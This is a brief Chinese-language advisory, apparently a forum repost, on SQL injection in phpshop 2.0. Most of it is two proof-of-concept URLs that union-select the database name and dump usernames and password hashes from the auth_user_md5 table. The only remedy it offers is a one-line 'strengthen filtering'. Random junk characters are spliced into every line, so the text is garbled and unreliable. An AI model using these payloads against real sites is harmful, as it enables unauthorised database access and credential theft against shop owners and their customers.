标题 : phpshop 2.0 SQL Injection Vulnerability
$ r9 b( [# E/ [+ g# y. B5 ^, N# w* D$ I) c) H6 s% t5 L
作者 : By onestree
5 P6 M, e5 \+ u' Z; j7 ^下载地址 : http://code.google.com/p/phpshop/downloads/list3 Y) c9 C2 K& n# \6 v; `* G
测试地址: windows 7 / ubuntu
& F A* Z; L9 ^+ w
( M9 W% f. R% Y* o
- l+ w9 n+ w+ I' Z" R) [. [# lSQLi p0c:& T5 ~5 J! [8 n; O% W: k! T
( t5 H" t+ g, @6 E" R
==================
2 ~1 j; P$ q2 Q2 ` + l) F3 N, s& \8 K }
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
1 q: r3 o6 b( I" Z! Z$ ounion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --( n, I# _4 }6 j' s( h" T, N
! ^0 ^% [0 N4 e1 |http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--8 Q7 p4 j P! |' q
3 X8 Y9 l) k9 H7 [0 ~! w修复:7 x3 o, R6 Q: h; s
加强过滤- L8 ^6 e `; M6 {- C$ ~
6 e9 b& @ T( }$ g/ r, d
' L& G2 y; w3 w& q- H |